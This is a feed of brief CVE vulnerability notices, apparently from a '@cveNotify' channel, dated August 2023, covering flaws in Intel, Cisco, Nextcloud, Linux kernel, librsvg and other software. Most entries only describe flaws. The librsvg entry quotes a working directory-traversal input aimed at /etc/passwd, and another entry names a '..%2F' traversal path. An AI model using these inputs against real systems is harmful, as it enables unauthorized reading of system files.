🚨 CVE-2022-34657Improper input validation in firmware for some Intel(R) PCSD BIOS before version 02.01.0013 may allow a privileged user to potentially enable information disclosure via local access.🎖@cveNotify |
|
| 2023-08-17 16:58:22 |
🚨 CVE-2022-36372Improper buffer restrictions in some Intel(R) NUC BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-08-17 16:58:21 |
🚨 CVE-2023-22330Use of uninitialized resource in some Intel(R) NUC BIOS firmware may allow a privileged user to potentially enable information disclosure via local access.🎖@cveNotify |
|
| 2023-08-17 16:58:20 |
🚨 CVE-2020-25575** UNSUPPORTED WHEN ASSIGNED ** An issue was discovered in the failure crate through 0.1.5 for Rust. It may introduce "compatibility hazards" in some applications, and has a type confusion flaw when downcasting. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: This may overlap CVE-2019-25010.🎖@cveNotify |
|
| 2023-08-17 16:58:19 |
🚨 CVE-2023-35163Vega is a decentralized trading platform that allows pseudo-anonymous trading of derivatives on a blockchain. Prior to version 0.71.6, a vulnerability exists that allows a malicious validator to trick the Vega network into re-processing past Ethereum events from Vega’s Ethereum bridge. For example, a deposit to the collateral bridge for 100USDT that credits a party’s general account on Vega, can be re-processed 50 times resulting in 5000USDT in that party’s general account. This is without depositing any more than the original 100USDT on the bridge. Despite this exploit requiring access to a validator's Vega key, a validator key can be obtained at the small cost of 3000VEGA, the amount needed to announce a new node onto the network.A patch is available in version 0.71.6. No known workarounds are available, however there are mitigations in place should this vulnerability be exploited. There are monitoring alerts for `mainnet1` in place to identify any issues of this nature including this vulnerability being exploited. The validators have the ability to stop the bridge thus stopping any withdrawals should this vulnerability be exploited.🎖@cveNotify |
|
| 2023-08-17 16:58:16 |
🚨 CVE-2023-39393Vulnerability of insecure signatures in the ServiceWifiResources module. Successful exploitation of this vulnerability may cause ServiceWifiResources to be maliciously modified and overwritten.🎖@cveNotify |
|
| 2023-08-17 16:58:15 |
🚨 CVE-2023-39388Vulnerability of input parameters being not strictly verified in the PMS module. Successful exploitation of this vulnerability may cause home screen unavailability.🎖@cveNotify |
|
| 2023-08-17 16:58:14 |
🚨 CVE-2023-39389Vulnerability of input parameters being not strictly verified in the PMS module. Successful exploitation of this vulnerability may cause home screen unavailability.🎖@cveNotify |
|
| 2023-08-17 16:58:13 |
🚨 CVE-2023-39269A vulnerability has been identified in RUGGEDCOM i800, RUGGEDCOM i800NC, RUGGEDCOM i801, RUGGEDCOM i801NC, RUGGEDCOM i802, RUGGEDCOM i802NC, RUGGEDCOM i803, RUGGEDCOM i803NC, RUGGEDCOM M2100, RUGGEDCOM M2100F, RUGGEDCOM M2100NC, RUGGEDCOM M2200, RUGGEDCOM M2200F, RUGGEDCOM M2200NC, RUGGEDCOM M969, RUGGEDCOM M969F, RUGGEDCOM M969NC, RUGGEDCOM RMC30, RUGGEDCOM RMC30NC, RUGGEDCOM RMC8388 V4.X, RUGGEDCOM RMC8388 V5.X, RUGGEDCOM RMC8388NC V4.X, RUGGEDCOM RMC8388NC V5.X, RUGGEDCOM RP110, RUGGEDCOM RP110NC, RUGGEDCOM RS1600, RUGGEDCOM RS1600F, RUGGEDCOM RS1600FNC, RUGGEDCOM RS1600NC, RUGGEDCOM RS1600T, RUGGEDCOM RS1600TNC, RUGGEDCOM RS400, RUGGEDCOM RS400F, RUGGEDCOM RS400NC, RUGGEDCOM RS401, RUGGEDCOM RS401NC, RUGGEDCOM RS416, RUGGEDCOM RS416F, RUGGEDCOM RS416NC, RUGGEDCOM RS416NC v2, RUGGEDCOM RS416P, RUGGEDCOM RS416PF, RUGGEDCOM RS416PNC, RUGGEDCOM RS416PNC v2, RUGGEDCOM RS416Pv2, RUGGEDCOM RS416v2, RUGGEDCOM RS8000, RUGGEDCOM RS8000A, RUGGEDCOM RS8000ANC, RUGGEDCOM RS8000H, RUGGEDCOM RS8000HNC, RUGGEDCOM RS8000NC, RUGGEDCOM RS8000T, RUGGEDCOM RS8000TNC, RUGGEDCOM RS900, RUGGEDCOM RS900 (32M) V4.X, RUGGEDCOM RS900 (32M) V5.X, RUGGEDCOM RS900F, RUGGEDCOM RS900G, RUGGEDCOM RS900G (32M) V4.X, RUGGEDCOM RS900G (32M) V5.X, RUGGEDCOM RS900GF, RUGGEDCOM RS900GNC, RUGGEDCOM RS900GNC(32M) V4.X, RUGGEDCOM RS900GNC(32M) V5.X, RUGGEDCOM RS900GP, RUGGEDCOM RS900GPF, RUGGEDCOM RS900GPNC, RUGGEDCOM RS900L, RUGGEDCOM RS900LNC, RUGGEDCOM RS900M-GETS-C01, RUGGEDCOM RS900M-GETS-XX, RUGGEDCOM RS900M-STND-C01, RUGGEDCOM RS900M-STND-XX, RUGGEDCOM RS900MNC-GETS-C01, RUGGEDCOM RS900MNC-GETS-XX, RUGGEDCOM RS900MNC-STND-XX, RUGGEDCOM RS900MNC-STND-XX-C01, RUGGEDCOM RS900NC, RUGGEDCOM RS900NC(32M) V4.X, RUGGEDCOM RS900NC(32M) V5.X, RUGGEDCOM RS900W, RUGGEDCOM RS910, RUGGEDCOM RS910L, RUGGEDCOM RS910LNC, RUGGEDCOM RS910NC, RUGGEDCOM RS910W, RUGGEDCOM RS920L, RUGGEDCOM RS920LNC, RUGGEDCOM RS920W, RUGGEDCOM RS930L, RUGGEDCOM RS930LNC, RUGGEDCOM RS930W, RUGGEDCOM RS940G, RUGGEDCOM RS940GF, RUGGEDCOM RS940GNC, RUGGEDCOM RS969, RUGGEDCOM RS969NC, RUGGEDCOM RSG2100, RUGGEDCOM RSG2100 (32M) V4.X, RUGGEDCOM RSG2100 (32M) V5.X, RUGGEDCOM RSG2100F, RUGGEDCOM RSG2100NC, RUGGEDCOM RSG2100NC(32M) V4.X, RUGGEDCOM RSG2100NC(32M) V5.X, RUGGEDCOM RSG2100P, RUGGEDCOM RSG2100PF, RUGGEDCOM RSG2100PNC, RUGGEDCOM RSG2200, RUGGEDCOM RSG2200F, RUGGEDCOM RSG2200NC, RUGGEDCOM RSG2288 V4.X, RUGGEDCOM RSG2288 V5.X, RUGGEDCOM RSG2288NC V4.X, RUGGEDCOM RSG2288NC V5.X, RUGGEDCOM RSG2300 V4.X, RUGGEDCOM RSG2300 V5.X, RUGGEDCOM RSG2300F, RUGGEDCOM RSG2300NC V4.X, RUGGEDCOM RSG2300NC V5.X, RUGGEDCOM RSG2300P V4.X, RUGGEDCOM RSG2300P V5.X, RUGGEDCOM RSG2300PF, RUGGEDCOM RSG2300PNC V4.X, RUGGEDCOM RSG2300PNC V5.X, RUGGEDCOM RSG2488 V4.X, RUGGEDCOM RSG2488 V5.X, RUGGEDCOM RSG2488F, RUGGEDCOM RSG2488NC V4.X, RUGGEDCOM RSG2488NC V5.X, RUGGEDCOM RSG907R, RUGGEDCOM RSG908C, RUGGEDCOM RSG909R, RUGGEDCOM RSG910C, RUGGEDCOM RSG920P V4.X, RUGGEDCOM RSG920P V5.X, RUGGEDCOM RSG920PNC V4.X, RUGGEDCOM RSG920PNC V5.X, RUGGEDCOM RSL910, RUGGEDCOM RSL910NC, RUGGEDCOM RST2228, RUGGEDCOM RST2228P, RUGGEDCOM RST916C, RUGGEDCOM RST916P. The web server of the affected devices contains a vulnerability that may lead to a denial of service condition.An attacker may cause total loss of availability of the web server, which might recover after the attack is over.🎖@cveNotify |
|
| 2023-08-17 14:58:32 |
🚨 CVE-2023-39394Vulnerability of API privilege escalation in the wifienhance module. Successful exploitation of this vulnerability may cause the arp list to be modified.🎖@cveNotify |
|
| 2023-08-17 14:58:31 |
🚨 CVE-2023-39395Mismatch vulnerability in the serialization process in the communication system. Successful exploitation of this vulnerability may affect availability.🎖@cveNotify |
|
| 2023-08-17 14:58:27 |
🚨 CVE-2023-39404Vulnerability of input parameter verification in certain APIs in the window management module. Successful exploitation of this vulnerability may cause the device to restart.🎖@cveNotify |
|
| 2023-08-17 14:58:26 |
🚨 CVE-2023-39397Input parameter verification vulnerability in the communication system. Successful exploitation of this vulnerability may affect availability.🎖@cveNotify |
|
| 2023-08-17 14:58:25 |
🚨 CVE-2023-39398Parameter verification vulnerability in the installd module. Successful exploitation of this vulnerability may cause sandbox files to be read and written without authorization.🎖@cveNotify |
|
| 2023-08-17 14:58:24 |
🚨 CVE-2023-39392Vulnerability of insecure signatures in the OsuLogin module. Successful exploitation of this vulnerability may cause OsuLogin to be maliciously modified and overwritten.🎖@cveNotify |
|
| 2023-08-17 14:58:20 |
🚨 CVE-2023-39399Parameter verification vulnerability in the installd module. Successful exploitation of this vulnerability may cause sandbox files to be read and written without authorization.🎖@cveNotify |
|
| 2023-08-17 14:58:19 |
🚨 CVE-2023-39403Parameter verification vulnerability in the installd module. Successful exploitation of this vulnerability may cause sandbox files to be read and written without authorization.🎖@cveNotify |
|
| 2023-08-17 14:58:18 |
🚨 CVE-2020-36023An issue was discovered in freedesktop poppler version 20.12.1, allows remote attackers to cause a denial of service (DoS) via crafted .pdf file to FoFiType1C::cvtGlyph function.🎖@cveNotify |
|
| 2023-08-17 14:58:14 |
🚨 CVE-2023-38902An issue in RG-EW series home routers and repeaters v.EW_3.0(1)B11P204, RG-NBS and RG-S1930 series switches v.SWITCH_3.0(1)B11P218, RG-EG series business VPN routers v.EG_3.0(1)B11P216, EAP and RAP series wireless access points v.AP_3.0(1)B11P218, and NBC series wireless controllers v.AC_3.0(1)B11P86 allows a remote attacker to execute arbitrary code via the unifyframe-sgi.elf component in sub_40DA38.🎖@cveNotify |
|
| 2023-08-17 14:58:13 |
🚨 CVE-2021-28427Buffer Overflow vulnerability in XNView version 2.49.3, allows local attackers to execute arbitrary code via crafted TIFF file.🎖@cveNotify |
|
| 2023-08-17 14:58:12 |
🚨 CVE-2023-3697Printer service fails to adequately handle user input, allowing an remote unauthorized users to navigate beyond the intended directory structure and create files. Affected products and versions include: ADM 4.0.6.RIS1, 4.1.0 and below as well as ADM 4.2.2.RI61 and below.🎖@cveNotify |
|
| 2023-08-17 13:58:13 |
🚨 CVE-2023-29182A stack-based buffer overflow vulnerability [CWE-121] in Fortinet FortiOS before 7.0.3 allows a privileged attacker to execute arbitrary code via specially crafted CLI commands, provided the attacker were able to evade FortiOS stack protections.🎖@cveNotify |
|
| 2023-08-17 13:58:12 |
🚨 CVE-2023-2910Improper neutralization of special elements used in a command ('Command Injection') vulnerability in Printer service functionality in ASUSTOR Data Master (ADM) allows remote unauthorized users to execute arbitrary commands via unspecified vectors. Affected products and versions include: ADM 4.0.6.RIS1, 4.1.0 and below as well as ADM 4.2.2.RI61 and below.🎖@cveNotify |
|
| 2023-08-17 13:58:11 |
🚨 CVE-2023-3698Printer service fails to adequately handle user input, allowing an remote unauthorized users to navigate beyond the intended directory structure and delete files. Affected products and versions include: ADM 4.0.6.RIS1, 4.1.0 and below as well as ADM 4.2.2.RI61 and below.🎖@cveNotify |
|
| 2023-08-17 10:58:18 |
🚨 CVE-2023-34216TN-4900 Series firmware versions v1.2.4 and prior and TN-5900 Series firmware versions v3.3 and prior are vulnerable to the command-injection vulnerability. This vulnerability derives from insufficient input validation in the key-delete function, which could potentially allow malicious users to delete arbitrary files. 🎖@cveNotify |
|
| 2023-08-17 10:58:17 |
🚨 CVE-2023-40251Missing Encryption of Sensitive DataCAPEC- vulnerability in Genians Genian NAC V4.0, Genians Genian NAC V5.0, Genians Genian NAC Suite V5.0, Genians Genian ZTNA allows Man in the Middle Attack.This issue affects Genian NAC V4.0: from V4.0.0 through V4.0.155; Genian NAC V5.0: from V5.0.0 through V5.0.42 (Revision 117460); Genian NAC Suite V5.0: from V5.0.0 through V5.0.54; Genian ZTNA: from V6.0.0 through V6.0.15.🎖@cveNotify |
|
| 2023-08-17 10:58:13 |
🚨 CVE-2023-40252Improper Control of Generation of Code ('Code Injection') vulnerability in Genians Genian NAC V4.0, Genians Genian NAC V5.0, Genians Genian NAC Suite V5.0, Genians Genian ZTNA allows Replace Trusted Executable.This issue affects Genian NAC V4.0: from V4.0.0 through V4.0.155; Genian NAC V5.0: from V5.0.0 through V5.0.42 (Revision 117460); Genian NAC Suite V5.0: from V5.0.0 through V5.0.54; Genian ZTNA: from V6.0.0 through V6.0.15.🎖@cveNotify |
|
| 2023-08-17 10:58:12 |
🚨 CVE-2023-40253Improper Control of Generation of Code ('Code Injection') vulnerability in Genians Genian NAC V4.0, Genians Genian NAC V5.0, Genians Genian NAC Suite V5.0, Genians Genian ZTNA allows Replace Trusted Executable.This issue affects Genian NAC V4.0: from V4.0.0 through V4.0.155; Genian NAC V5.0: from V5.0.0 through V5.0.42 (Revision 117460); Genian NAC Suite V5.0: from V5.0.0 through V5.0.54; Genian ZTNA: from V6.0.0 through V6.0.15.🎖@cveNotify |
|
| 2023-08-17 10:58:11 |
🚨 CVE-2023-40254Improper Control of Generation of Code ('Code Injection') vulnerability in Genians Genian NAC V4.0, Genians Genian NAC V5.0, Genians Genian NAC Suite V5.0, Genians Genian ZTNA allows Replace Trusted Executable.This issue affects Genian NAC V4.0: from V4.0.0 through V4.0.155; Genian NAC V5.0: from V5.0.0 through V5.0.42 (Revision 117460); Genian NAC Suite V5.0: from V5.0.0 through V5.0.54; Genian ZTNA: from V6.0.0 through V6.0.15.🎖@cveNotify |
|
| 2023-08-17 05:58:37 |
🚨 CVE-2023-34214TN-4900 Series firmware versions v1.2.4 and prior and TN-5900 Series firmware versions v3.3 and prior are vulnerable to the command-injection vulnerability. This vulnerability stems from insufficient input validation in the certificate-generation function, which could potentially allow malicious users to execute remote code on affected devices. 🎖@cveNotify |
|
| 2023-08-17 05:58:36 |
🚨 CVE-2023-39383Vulnerability of input parameters being not strictly verified in the AMS module. Successful exploitation of this vulnerability may compromise apps' data security.🎖@cveNotify |
|
| 2023-08-17 05:58:35 |
🚨 CVE-2023-39380Permission control vulnerability in the audio module. Successful exploitation of this vulnerability may cause audio devices to perform abnormally.🎖@cveNotify |
|
| 2023-08-17 05:58:34 |
🚨 CVE-2023-33237TN-5900 Series firmware version v3.3 and prior is vulnerable to improper-authentication vulnerability. This vulnerability arises from inadequate authentication measures implemented in the web API handler, allowing low-privileged APIs to execute restricted actions that only high-privileged APIs are allowed This presents a potential risk of unauthorized exploitation by malicious actors. 🎖@cveNotify |
|
| 2023-08-17 05:58:30 |
🚨 CVE-2023-39381 Input verification vulnerability in the storage module. Successful exploitation of this vulnerability may cause the device to restart.🎖@cveNotify |
|
| 2023-08-17 05:58:29 |
🚨 CVE-2020-36024An issue was discovered in freedesktop poppler version 20.12.1, allows remote attackers to cause a denial of service (DoS) via crafted .pdf file to FoFiType1C::convertToType1 function.🎖@cveNotify |
|
| 2023-08-17 05:58:28 |
🚨 CVE-2020-24922Cross Site Request Forgery (CSRF) vulnerability in xxl-job-admin/user/add in xuxueli xxl-job version 2.2.0, allows remote attackers to execute arbitrary code and esclate privileges via crafted .html file.🎖@cveNotify |
|
| 2023-08-17 05:58:24 |
🚨 CVE-2020-28848CSV Injection vulnerability in ChurchCRM version 4.2.0, allows remote attackers to execute arbitrary code via crafted CSV file.🎖@cveNotify |
|
| 2023-08-17 05:58:23 |
🚨 CVE-2020-28849Cross Site Scripting (XSS) vulnerability in ChurchCRM version 4.2.1, allows remote attckers to execute arbitrary code and gain sensitive information via crafted payload in Add New Deposit field in View All Deposit module.🎖@cveNotify |
|
| 2023-08-17 05:58:22 |
🚨 CVE-2023-4273A flaw was found in the exFAT driver of the Linux kernel. The vulnerability exists in the implementation of the file name reconstruction function, which is responsible for reading file name entries from a directory index and merging file name parts belonging to one file into a single long file name. Since the file name characters are copied into a stack variable, a local privileged attacker could use this flaw to overflow the kernel stack.🎖@cveNotify |
|
| 2023-08-17 05:58:18 |
🚨 CVE-2020-24904An issue was discovered in attach parameter in GNOME Gmail version 2.5.4, allows remote attackers to gain sensitive information via crafted "mailto" link.🎖@cveNotify |
|
| 2023-08-17 05:58:17 |
🚨 CVE-2020-23595Cross Site Request Forgery (CSRF) vulnerability in yzmcms version 5.6, allows remote attackers to escalate privileges and gain sensitive information sitemodel/add.html endpoint.🎖@cveNotify |
|
| 2023-08-17 05:58:16 |
🚨 CVE-2023-25757Improper access control in some Intel(R) Unison(TM) software before version 10.12 may allow a privileged user to potentially enable escalation of privilege via network access.🎖@cveNotify |
|
| 2023-08-17 00:58:31 |
🚨 CVE-2023-35009IBM Cognos Analytics 11.1.7, 11.2.0, and 11.2.1 could allow a remote attacker to obtain system information without authentication which could be used in reconnaissance to gather information that could be used for future attacks. IBM X-Force ID: 257703.🎖@cveNotify |
|
| 2023-08-17 00:58:30 |
🚨 CVE-2023-20013Multiple vulnerabilities in Cisco Intersight Private Virtual Appliance could allow an authenticated, remote attacker to execute arbitrary commands using root-level privileges. The attacker would need to have Administrator privileges on the affected device to exploit these vulnerabilities. These vulnerabilities are due to insufficient input validation when extracting uploaded software packages. An attacker could exploit these vulnerabilities by authenticating to an affected device and uploading a crafted software package. A successful exploit could allow the attacker to execute commands on the underlying operating system with root-level privileges.🎖@cveNotify |
|
| 2023-08-17 00:58:29 |
🚨 CVE-2023-20111A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to access sensitive information. This vulnerability is due to the improper storage of sensitive information within the web-based management interface. An attacker could exploit this vulnerability by logging in to the web-based management interface and viewing hidden fields within the application. A successful exploit could allow the attacker to access sensitive information, including device entry credentials, that could aid the attacker in further attacks.🎖@cveNotify |
|
| 2023-08-17 00:58:25 |
🚨 CVE-2023-20197A vulnerability in the filesystem image parser for Hierarchical File System Plus (HFS+) of ClamAV could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to an incorrect check for completion when a file is decompressed, which may result in a loop condition that could cause the affected software to stop responding. An attacker could exploit this vulnerability by submitting a crafted HFS+ filesystem image to be scanned by ClamAV on an affected device. A successful exploit could allow the attacker to cause the ClamAV scanning process to stop responding, resulting in a DoS condition on the affected software and consuming available system resources. For a description of this vulnerability, see the ClamAV blog .🎖@cveNotify |
|
| 2023-08-17 00:58:24 |
🚨 CVE-2023-20203Multiple vulnerabilities in the web-based management interface of Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager (EPNM) could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface on an affected device. These vulnerabilities are due to insufficient validation of user-supplied input. An attacker could exploit these vulnerabilities by persuading a user of an affected interface to view a page containing malicious HTML or script content. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit these vulnerabilities, the attacker must have valid credentials to access the web-based management interface of the affected device.🎖@cveNotify |
|
| 2023-08-17 00:58:23 |
🚨 CVE-2023-20211A vulnerability in the web-based management interface of Cisco Unified Communications Manager (Unified CM) and Cisco Unified Communications Manager Session Management Edition (Unified CM SME) could allow an authenticated, remote attacker to conduct SQL injection attacks on an affected system. This vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by authenticating to the application as a user with read-only or higher privileges and sending crafted HTTP requests to an affected system. A successful exploit could allow the attacker to read or modify data in the underlying database or elevate their privileges.🎖@cveNotify |
|
| 2023-08-17 00:58:19 |
🚨 CVE-2023-20221A vulnerability in the web-based management interface of Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack against a user of the web-based management interface of an affected system. This vulnerability is due to insufficient CSRF protections for the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading an authenticated user of the interface to follow a crafted link. A successful exploit could allow the attacker to perform a factory reset of the affected device, resulting in a Denial of Service (DoS) condition.🎖@cveNotify |
|
| 2023-08-17 00:58:18 |
🚨 CVE-2023-20222A vulnerability in the web-based management interface of Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager (EPNM) could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface on an affected device. The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of an affected system. An attacker could exploit this vulnerability by injecting malicious code into specific pages of the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.🎖@cveNotify |
|
| 2023-08-17 00:58:17 |
🚨 CVE-2023-20229A vulnerability in the CryptoService function of Cisco Duo Device Health Application for Windows could allow an authenticated, local attacker with low privileges to conduct directory traversal attacks and overwrite arbitrary files on an affected system. This vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by executing a directory traversal attack on an affected host. A successful exploit could allow an attacker to use a cryptographic key to overwrite arbitrary files with SYSTEM-level privileges, resulting in a denial of service (DoS) condition or data loss on the affected system.🎖@cveNotify |
|
| 2023-08-17 00:58:13 |
🚨 CVE-2023-20232A vulnerability in the Tomcat implementation for Cisco Unified Contact Center Express (Unified CCX) could allow an unauthenticated, remote attacker to cause a web cache poisoning attack on an affected device. This vulnerability is due to improper input validation of HTTP requests. An attacker could exploit this vulnerability by sending crafted HTTP requests to a specific API endpoint on the Unified CCX Finesse Portal. A successful exploit could allow the attacker to cause the internal WebProxy to redirect users to an attacker-controlled host.🎖@cveNotify |
|
| 2023-08-17 00:58:12 |
🚨 CVE-2023-38894A Prototype Pollution issue in Cronvel Tree-kit v.0.7.4 and before allows a remote attacker to execute arbitrary code via the extend function.🎖@cveNotify |
|
| 2023-08-17 00:58:11 |
🚨 CVE-2023-39846An issue in Konga v0.14.9 allows attackers to bypass authentication via a crafted JWT token.🎖@cveNotify |
|
| 2023-08-16 22:58:40 |
🚨 CVE-2023-27506Improper buffer restrictions in the Intel(R) Optimization for Tensorflow software before version 2.12 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-08-16 22:58:39 |
🚨 CVE-2023-2905Due to a failure in validating the length of a provided MQTT_CMD_PUBLISH parsed message with a variable length header, Cesanta Mongoose, an embeddable web server, version 7.10 is susceptible to a heap-based buffer overflow vulnerability in the default configuration. Version 7.9 and prior does not appear to be vulnerable. This issue is resolved in version 7.11.🎖@cveNotify |
|
| 2023-08-16 22:58:38 |
🚨 CVE-2023-25182Uncontrolled search path element in the Intel(R) Unite(R) Client software for Mac before version 4.2.11 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-08-16 22:58:34 |
🚨 CVE-2023-27392Incorrect default permissions in the Intel(R) Support android application before version v23.02.07 may allow a privileged user to potentially enable information disclosure via local access.🎖@cveNotify |
|
| 2023-08-16 22:58:33 |
🚨 CVE-2023-4128A use-after-free flaw was found in net/sched/cls_fw.c in classifiers (cls_fw, cls_u32, and cls_route) in the Linux Kernel. This flaw allows a local attacker to perform a local privilege escalation due to incorrect handling of the existing filter, leading to a kernel information leak issue.🎖@cveNotify |
|
| 2023-08-16 22:58:32 |
🚨 CVE-2021-25864node-red-contrib-huemagic 3.0.0 is affected by hue/assets/..%2F Directory Traversal.in the res.sendFile API, used in file hue-magic.js, to fetch an arbitrary file.🎖@cveNotify |
|
| 2023-08-16 22:58:29 |
🚨 CVE-2023-39952Nextcloud Server provides data storage for Nextcloud, an open source cloud platform. Starting in version 22.0.0 and prior to versions 22.2.10.13, 23.0.12.8, 24.0.12.4, 25.0.8, 26.0.3, and 27.0.1, a user can access files inside a subfolder of a groupfolder accessible to them, even if advanced permissions would block access to the subfolder. Nextcloud Server versions 25.0.8, 26.0.3, and 27.0.1 and Nextcloud Enterprise Server versions 22.2.10.13, 23.0.12.8, 24.0.12.4, 25.0.8, 26.0.3, and 27.0.1 contain a patch for this issue. No known workarounds are available.🎖@cveNotify |
|
| 2023-08-16 22:58:28 |
🚨 CVE-2023-28075Dell BIOS contain a Time-of-check Time-of-use vulnerability in BIOS. A local authenticated malicious user with physical access to the system could potentially exploit this vulnerability by using a specifically timed DMA transaction during an SMI in order to gain arbitrary code execution on the system.🎖@cveNotify |
|
| 2023-08-16 22:58:27 |
🚨 CVE-2023-4382A vulnerability, which was classified as problematic, has been found in tdevs Hyip Rio 2.1. Affected by this issue is some unknown functionality of the file /user/settings of the component Profile Settings. The manipulation of the argument avatar leads to cross site scripting. The attack may be launched remotely. VDB-237314 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-08-16 22:58:23 |
🚨 CVE-2023-4384A vulnerability has been found in MaximaTech Portal Executivo 21.9.1.140 and classified as problematic. This vulnerability affects unknown code of the component Cookie Handler. The manipulation leads to missing encryption of sensitive data. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-237316. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-08-16 22:58:22 |
🚨 CVE-2021-27523An issue was discovered in open-falcon dashboard version 0.2.0, allows remote attackers to gain, modify, and delete sensitive information via crafted POST request to register interface.🎖@cveNotify |
|
| 2023-08-16 22:58:21 |
🚨 CVE-2023-32609Improper access control in the Intel Unite(R) android application before version 4.2.3504 may allow an authenticated user to potentially enable information disclosure via local access.🎖@cveNotify |
|
| 2023-08-16 20:58:38 |
🚨 CVE-2023-38633A directory traversal problem in the URL decoder of librsvg before 2.56.3 could be used by local or remote attackers to disclose files (on the local filesystem outside of the expected area), as demonstrated by href=".?../../../../../../../../../../etc/passwd" in an xi:include element.🎖@cveNotify |
|
| 2023-08-16 20:58:37 |
🚨 CVE-2023-34615An issue was discovered JSONUtil thru 5.0 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.🎖@cveNotify |
|
| 2023-08-16 20:58:36 |
🚨 CVE-2023-4387A use-after-free flaw was found in vmxnet3_rq_alloc_rx_buf in drivers/net/vmxnet3/vmxnet3_drv.c in VMware's vmxnet3 ethernet NIC driver in the Linux Kernel. This issue could allow a local attacker to crash the system due to a double-free while cleaning up vmxnet3_rq_cleanup_all, which could also lead to a kernel information leak problem.🎖@cveNotify |
|
| 2023-08-16 20:58:32 |
🚨 CVE-2023-4389A flaw was found in btrfs_get_root_ref in fs/btrfs/disk-io.c in the btrfs filesystem in the Linux Kernel due to a double decrement of the reference count. This issue may allow a local attacker with user privilege to crash the system or may lead to leaked internal kernel information.🎖@cveNotify |
|
| 2023-08-16 20:58:31 |
🚨 CVE-2023-39953user_oidc provides the OIDC connect user backend for Nextcloud, an open-source cloud platform. Starting in version 1.0.0 and prior to version 1.3.3, missing verification of the issuer would have allowed an attacker to perform a man-in-the-middle attack returning corrupted or known token they also have access to. user_oidc 1.3.3 contains a patch. No known workarounds are available.🎖@cveNotify |
|
| 2023-08-16 20:58:30 |
🚨 CVE-2023-39250Dell Storage Integration Tools for VMware (DSITV) 06.01.00.016 contain an information disclosure vulnerability. A local low-privileged malicious user could potentially exploit this vulnerability to retrieve an encryption key that could aid in further attacks.🎖@cveNotify |
|
| 2023-08-16 20:58:26 |
🚨 CVE-2023-4385A NULL pointer dereference flaw was found in dbFree in fs/jfs/jfs_dmap.c in the journaling file system (JFS) in the Linux Kernel. This issue may allow a local attacker to crash the system due to a missing sanity check.🎖@cveNotify |
|
| 2023-08-16 20:58:25 |
🚨 CVE-2023-399651Panel is an open source Linux server operation and maintenance management panel. In version 1.4.3, authenticated attackers can download arbitrary files through the API interface. This code has unauthorized access. Attackers can freely download the file content on the target system. This may cause a large amount of information leakage. Version 1.5.0 has a patch for this issue.🎖@cveNotify |
|
| 2023-08-16 20:58:24 |
🚨 CVE-2019-13192Some Brother printers (such as the HL-L8360CDW v1.20) were affected by a heap buffer overflow vulnerability as the IPP service did not parse attribute names properly. This would allow an attacker to execute arbitrary code on the device.🎖@cveNotify |
|
| 2023-08-16 20:58:21 |
🚨 CVE-2019-13194Some Brother printers (such as the HL-L8360CDW v1.20) were affected by different information disclosure vulnerabilities that provided sensitive information to an unauthenticated user who visits a specific URL.🎖@cveNotify |
|
| 2023-08-16 20:58:20 |
🚨 CVE-2023-399641Panel is an open source Linux server operation and maintenance management panel. In version 1.4.3, arbitrary file reads allow an attacker to read arbitrary important configuration files on the server. In the `api/v1/file.go` file, there is a function called `LoadFromFile`, which directly reads the file by obtaining the requested path `parameter[path]`. The request parameters are not filtered, resulting in a background arbitrary file reading vulnerability. Version 1.5.0 has a patch for this issue.🎖@cveNotify |
|
| 2023-08-16 20:58:19 |
🚨 CVE-2023-39961Nextcloud Server provides data storage for Nextcloud, an open source cloud platform. Starting in version 24.0.4 and prior to versions 25.0.9, 26.0.4, and 27.0.1, when a folder with images or an image was shared without download permissions, the user could add the image inline into a text file and download it. Nextcloud Server versions 25.0.9, 26.0.4, and 27.0.1 and Nextcloud Enterprise Server versions 24.0.12.5, 25.0.9, 26.0.4, and 27.0.1 contain a patch for this issue. No known workarounds are available.🎖@cveNotify |
|
| 2023-08-16 20:58:18 |
🚨 CVE-2023-33468KramerAV VIA Connect (2) and VIA Go (2) devices with a version prior to 4.0.1.1326 exhibit a vulnerability that enables remote manipulation of the device. This vulnerability involves extracting the connection confirmation code remotely, bypassing the need to obtain it directly from the physical screen.🎖@cveNotify |
|
| 2023-08-16 19:58:30 |
🚨 CVE-2021-34704A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to trigger a denial of service (DoS) condition. This vulnerability is due to improper input validation when parsing HTTPS requests. An attacker could exploit this vulnerability by sending a malicious HTTPS request to an affected device. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition.🎖@cveNotify |
|
| 2023-08-16 19:58:26 |
